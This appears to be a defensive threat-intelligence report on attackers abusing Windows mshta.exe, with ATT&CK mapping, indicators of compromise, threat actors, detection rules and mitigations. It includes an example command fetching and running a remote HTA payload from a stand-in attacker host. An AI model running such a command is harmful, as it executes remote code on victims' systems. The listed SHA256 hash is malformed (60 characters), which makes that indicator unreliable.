Full Report
Bitdefender security researchers have discovered that attackers continue to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.
Analysis Summary
# Tool/Technique: MSHTA (Living-off-the-Land Binary)
## Overview
MSHTA (`mshta.exe`) is a legitimate legacy Windows utility designed to execute HTML Applications (HTA). It uses the Internet Explorer rendering engine to execute VBScript or JavaScript code from local or remote files. Attackers abuse this tool as a Living-off-the-Land Binary (LOLBIN) to bypass security controls and execute malicious scripts within a trusted, Microsoft-signed process.
## Technical Details
- **Type**: Technique (LOLBIN / Execution Vector)
- **Platform**: Windows
- **Capabilities**: Script execution (VBScript/JavaScript), remote file retrieval, multi-stage delivery, bypassing application whitelisting.
- **First Seen**: Legacy utility; active exploitation is ongoing with a recent surge in 2024-2025.
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- **T1218 - System Binary Proxy Execution**
- **T1218.005 - MSHTA**
- **TA0005 - Defense Evasion**
- **T1140 - Deobfuscate/Decode Files or Information**
- **TA0001 - Initial Access**
- **T1566.002 - Phishing: Spearphishing Link**
## Functionality
### Core Capabilities
- **Script Hosting**: Executes embedded VBScript and JavaScript outside the browser's sandbox.
- **Remote Fetching**: Capable of fetching and executing HTA files directly from a URL (e.g., `mshta.exe http://attacker[.]com/payload.hta`).
- **COM Access**: Can interact with COM objects to invoke other system tools like PowerShell or WMI.
### Advanced Features
- **Fileless Execution**: Used in multi-stage chains where the payload is never written to disk, residing only in memory or passed via command-line arguments.
- **Polymorphic Loaders**: Associated with the "CountLoader" framework, which uses rotating domain patterns and encrypted HTA files to evade signature-based detection.
## Indicators of Compromise
### File Hashes (Screener/Payloads)
- **SHA256**: `198CA5F4DF168BBFC06C61AB618F2E86BF69471BBA6C283AABEA190499BA` (del.ps1)
- **SHA256**: Various hashes associated with HTA loaders (CountLoader).
### File Names
- `checking.hta`
- `d6.hta`
- `r7.hta`
- `del.ps1`
### Network Indicators
- **C2/Hosting Domains**:
- `asq[.]d6shiiwz[.]pw`
- `asd[.]s7610rir[.]pw`
- `d1[.]pool4883[.]pw`
- `us1[.]somepools555[.]pw`
- **IP Addresses**:
- `185[.]208[.]159[.]199`
- `87[.]96[.]21[.]84`
- `58[.]221[.]252[.]210` (PurpleFox MSI delivery)
### Behavioral Indicators
- `mshta.exe` spawning `powershell.exe` or `cmd.exe`.
- `mshta.exe` communicating with external IP addresses or non-standard ports.
- Execution of `mshta.exe` with a URL in the command-line arguments.
## Associated Threat Actors
- **PurpleFox**: Uses MSHTA for initial stages of MSI delivery.
- **LummaStealer/Amatera Operators**: Utilize "ClickFix" social engineering lures to trigger MSHTA.
- **CountLoader Operators**: Heavy users of HTA-based delivery chains.
- **ClipBanker**: Leveraging MSHTA for persistent compromise.
## Detection Methods
- **Behavioral Detection**: Monitor for `mshta.exe` making network connections or spawning shells. Use EDR to flag parent-child relationships where `mshta.exe` is the parent of script engines.
- **Command Line Monitoring**: Log and alert on command lines containing "http", "javascript:", or "vbscript:".
- **Signature-based**: Detect HTA files containing heavily obfuscated scripts or known delivery patterns (e.g., CountLoader domain structures).
## Mitigation Strategies
- **Attack Surface Reduction (ASR)**: Implement rules to "Block Office applications from creating child processes."
- **Application Control**: Use Windows Defender Application Control (WDAC) or AppLocker to block `mshta.exe` if not required for business operations.
- **Feature Management**: As Microsoft deprecates VBScript, ensure the "VBScript Feature on Demand" is disabled where possible.
- **User Training**: Educate users on "ClickFix" lures, such as fake "browser update" or "fix error" prompts.
## Related Tools/Techniques
- **LUMMA / LummaStealer**: Commodity stealer often delivered via MSHTA.
- **CastleLoader**: Loader specializing in fileless delivery via HTA.
- **ClickFix**: Social engineering technique used to trick users into executing MSHTA commands.